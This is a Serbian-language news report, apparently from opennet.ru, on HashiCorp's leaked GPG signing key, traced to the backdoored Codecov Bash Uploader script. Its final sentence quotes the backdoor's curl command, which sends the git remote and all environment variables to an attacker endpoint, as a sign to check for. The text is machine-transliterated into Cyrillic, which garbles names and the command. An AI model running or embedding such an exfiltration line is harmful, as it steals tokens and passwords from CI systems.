ХасхиЦорп, познат по развоју алата отвореног кода Вагрант, Пацкер, Номад и Терраформ, најавио је цурење приватног ГПГ кључа који се користи за креирање дигиталних потписа који верифицирају издања. Нападачи који су добили приступ ГПГ кључу могли би потенцијално да изврше скривене промене у ХасхиЦорп производима тако што ће их верификовати исправним дигиталним потписом. Истовремено, компанија је навела да током ревизије нису идентификовани никакви трагови покушаја оваквих модификација.
Тренутно, компромитовани ГПГ кључ је опозван и уместо њега уведен је нови кључ. Проблем је утицао само на верификацију помоћу датотека СХА256СУМ и СХА256СУМ.сиг и није утицао на генерисање дигиталних потписа за Линук ДЕБ и РПМ пакете који се испоручују преко релеасес.хасхицорп.цом, као и на механизме верификације издања за мацОС и Виндовс (АутхентиЦоде) .
До цурења је дошло због употребе скрипте Цодецов Басх Уплоадер (цодецов-басх) у инфраструктури, дизајниране за преузимање извештаја о покривености из система континуиране интеграције. Током напада на компанију Цодецов, у наведену скрипту је сакривен бацкдоор, преко којег су лозинке и кључеви за шифровање послани на сервер нападача.
Да би хаковали, нападачи су искористили грешку у процесу креирања Цодецов Доцкер слике, која им је омогућила да извуку приступне податке ГЦС-у (Гоогле Цлоуд Стораге), неопходне за уношење промена у скрипту Басх Уплоадер дистрибуирану са цодецов.ио веб сајт. Промене су унете 31. јануара, остале су неоткривене два месеца и омогућиле су нападачима да извуку информације ускладиштене у окружењима система за континуирану интеграцију корисника. Коришћењем додатог злонамерног кода, нападачи су могли да добију информације о тестираном Гит спремишту и свим варијаблама окружења, укључујући токене, кључеве за шифровање и лозинке које се преносе у системе за континуирану интеграцију како би организовали приступ коду апликације, репозиторијумима и услугама као што су Амазон Веб Сервицес и ГитХуб.
Поред директног позива, скрипта Цодецов Басх Уплоадер је коришћена као део других отпремача, као што су Цодецов-ацтион (Гитхуб), Цодецов-цирцлеци-орб и Цодецов-битрисе-степ, на чије кориснике такође утиче проблем. Свим корисницима цодецов-басх и сродних производа препоручује се ревизија своје инфраструктуре, као и промена лозинки и кључева за шифровање. Можете проверити присуство бацкдоор-а у скрипти присуством линије цурл -см 0.5 -д “$(гит ремоте -в)<<<<<< ЕНВ $(енв)” хттп:// /уплоад/в2 || истина
Извор: опеннет.ру